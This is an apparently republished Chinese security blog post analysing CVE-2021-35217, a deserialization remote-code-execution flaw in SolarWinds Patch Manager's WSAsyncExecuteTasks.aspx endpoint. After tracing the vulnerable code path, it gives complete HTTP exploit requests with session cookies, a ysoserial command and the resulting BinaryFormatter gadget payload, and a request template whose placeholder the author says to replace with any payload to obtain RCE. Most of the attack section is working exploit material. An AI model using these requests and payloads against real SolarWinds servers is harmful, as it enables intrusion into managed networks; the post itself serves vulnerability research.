6

CVE-2021-35217 SolarWinds PM WSAsyncExecuteTasks RCE

 2 years ago
source link: https://y4er.com/post/cve-2021-35217-solarwinds-patch-manager-wsasyncexecutetasks-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

CVE-2021-35217 SolarWinds PM WSAsyncExecuteTasks RCE

2021-10-23 代码审计 CVE SolarWinds

继推特@testanull的研究文章,分析另一个RCE CVE-2021–35217。

1.png

漏洞位置出现在 http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx

在OnInit()初始化时,从request中反序列化出JSONData传递给ExecuteItem()方法。

2.png

跟进ExecuteItem()方法

3.png

123行到138行从JSONData中取ServerControlDefinition,用|=分割放入var parameters = new Dictionary<String, String>();这个字符串类型的键值对。

140行从parameters中取Control值加载控件,那么控件值可控。141行判断控件对象是否是ScmResourceBaseAsync类型,不是的话154行直接return。

那么先找ScmResourceBaseAsync类型的控件。

4.png

我用的是~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx

此时构造请求

POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
Host: 192.168.137.130:8787
Content-Length: 3370
Cache-Control: max-age=0
Origin: http://192.168.137.130:8787
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __AntiXsrfToken=49d368c51e2b4bffbbeae1904e825850; Orion_IsSessionExp=TRUE; ASP.NET_SessionId=3iel4j1s0uuvy3n0dkpugw30; .ASPXAUTH=B57BE373D7D9F57BE66003BCBCD663097E6FD5979FA91CA0965925EF9F662DFAB27DBB05B583F996018A5F7D78F2C6A2359918791EE44E7DACF4031FAB5E393924CB249702AED0D100289B94588277792D5C27B5C4E3089926CA43FD2733491A66D224CFF83D7803E25CF52EAEC35C2723BAD30A762E1EBA62543BFB203B6E5B3CAC97CCBF32C724994B67E47320F56FC2498C105BB89DE7917FE3923401C0B86C6B1A8ACB583A763D89344AA7561E1F; XSRF-TOKEN=gHBB9ZU1MA4DQazR0Fburx9Yjf05BEMOTYPUmxGLL1s=
Connection: close

[{"ResourceId":null,"Hash":null,"ServerMethod":null,"ServerControlDefinition":"Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=test|config.PreLoadMethodSerial=test;test","Parameters":[]}]

SolarWinds.PM.Web.dll!SolarWinds.PM.Web.Resources.ScmResourceBaseAsync.OnLoad(System.EventArgs e)

5.png

发现如果PreLoadMethodSerial不为空就会进入反序列化

6.png

而反序列化更是直接使用了BinaryFormatter,所以直接可以RCE。

C:\Users\admin\Downloads\ysoserial-1.34\Release>ysoserial.exe -f binaryformatter -g SessionSecurityToken -c "ping localhost -t"
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uSWRlbnRpdHlNb2RlbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAADBTeXN0ZW0uSWRlbnRpdHlNb2RlbC5Ub2tlbnMuU2Vzc2lvblNlY3VyaXR5VG9rZW4BAAAADFNlc3Npb25Ub2tlbgcCAgAAAAkDAAAADwMAAADRBQAAAkAUU2VjdXJpdHlDb250ZXh0VG9rZW5AB1ZlcnNpb26DQBlTZWN1cmVDb252ZXJzYXRpb25WZXJzaW9umShodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzAyL3NjQAJJZINACUNvbnRleHRJZINAA0tleZ8BAUANRWZmZWN0aXZlVGltZYNACkV4cGlyeVRpbWWDQBBLZXlFZmZlY3RpdmVUaW1lg0ANS2V5RXhwaXJ5VGltZYNAD0NsYWltc1ByaW5jaXBhbEAKSWRlbnRpdGllc0AISWRlbnRpdHlADkJvb3RTdHJhcFRva2VumtQEQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFGNU5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSXNJRlpsY25OcGIyNDlNeTR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmowek1XSm1NemcxTm1Ga016WTBaVE0xQlFFQUFBQkNUV2xqY205emIyWjBMbFpwYzNWaGJGTjBkV1JwYnk1VVpYaDBMa1p2Y20xaGRIUnBibWN1VkdWNGRFWnZjbTFoZEhScGJtZFNkVzVRY205d1pYSjBhV1Z6QVFBQUFBOUdiM0psWjNKdmRXNWtRbkoxYzJnQkFnQUFBQVlEQUFBQXZ3VThQM2h0YkNCMlpYSnphVzl1UFNJeExqQWlJR1Z1WTI5a2FXNW5QU0oxZEdZdE9DSS9QZzBLUEU5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2lCTlpYUm9iMlJPWVcxbFBTSlRkR0Z5ZENJZ1NYTkpibWwwYVdGc1RHOWhaRVZ1WVdKc1pXUTlJa1poYkhObElpQjRiV3h1Y3owaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3dmNISmxjMlZ1ZEdGMGFXOXVJaUI0Yld4dWN6cHpaRDBpWTJ4eUxXNWhiV1Z6Y0dGalpUcFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTTdZWE56WlcxaWJIazlVM2x6ZEdWdElpQjRiV3h1Y3pwNFBTSm9kSFJ3T2k4dmMyTm9aVzFoY3k1dGFXTnliM052Wm5RdVkyOXRMM2RwYm1aNEx6SXdNRFl2ZUdGdGJDSStEUW9nSUR4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvZ0lDQWdQSE5rT2xCeWIyTmxjM00rRFFvZ0lDQWdJQ0E4YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnSUNBZ0lEeHpaRHBRY205alpYTnpVM1JoY25SSmJtWnZJRUZ5WjNWdFpXNTBjejBpTDJNZ2NHbHVaeUJzYjJOaGJHaHZjM1FnTFhRaUlGTjBZVzVrWVhKa1JYSnliM0pGYm1OdlpHbHVaejBpZTNnNlRuVnNiSDBpSUZOMFlXNWtZWEprVDNWMGNIVjBSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJWYzJWeVRtRnRaVDBpSWlCUVlYTnpkMjl5WkQwaWUzZzZUblZzYkgwaUlFUnZiV0ZwYmowaUlpQk1iMkZrVlhObGNsQnliMlpwYkdVOUlrWmhiSE5sSWlCR2FXeGxUbUZ0WlQwaVkyMWtJaUF2UGcwS0lDQWdJQ0FnUEM5elpEcFFjbTlqWlhOekxsTjBZWEowU1c1bWJ6NE5DaUFnSUNBOEwzTmtPbEJ5YjJObGMzTStEUW9nSUR3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeUxrOWlhbVZqZEVsdWMzUmhibU5sUGcwS1BDOVBZbXBsWTNSRVlYUmhVSEp2ZG1sa1pYSStDdz09AQEBAQEL

Response.Write(HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes("AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uSWRlbnRpdHlNb2RlbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv...QEL")));

POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
Host: 192.168.137.130:8787
Content-Length: 3370
Cache-Control: max-age=0
Origin: http://192.168.137.130:8787
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __AntiXsrfToken=49d368c51e2b4bffbbeae1904e825850; Orion_IsSessionExp=TRUE; ASP.NET_SessionId=3iel4j1s0uuvy3n0dkpugw30; .ASPXAUTH=B57BE373D7D9F57BE66003BCBCD663097E6FD5979FA91CA0965925EF9F662DFAB27DBB05B583F996018A5F7D78F2C6A2359918791EE44E7DACF4031FAB5E393924CB249702AED0D100289B94588277792D5C27B5C4E3089926CA43FD2733491A66D224CFF83D7803E25CF52EAEC35C2723BAD30A762E1EBA62543BFB203B6E5B3CAC97CCBF32C724994B67E47320F56FC2498C105BB89DE7917FE3923401C0B86C6B1A8ACB583A763D89344AA7561E1F; XSRF-TOKEN=gHBB9ZU1MA4DQazR0Fburx9Yjf05BEMOTYPUmxGLL1s=
Connection: close

[{"ResourceId":null,"Hash":null,"ServerMethod":null,"ServerControlDefinition":"Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=HERE IS YOUR PAYLOAD|config.PreLoadMethodSerial=SolarWinds.Orion.Core.Models.Actions.Contexts.AlertingActionContext, SolarWinds.Orion.Actions.Models;asd","Parameters":[]}]

替换HERE IS YOUR PAYLOAD为你的payload,然后就RCE了。

7.png

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK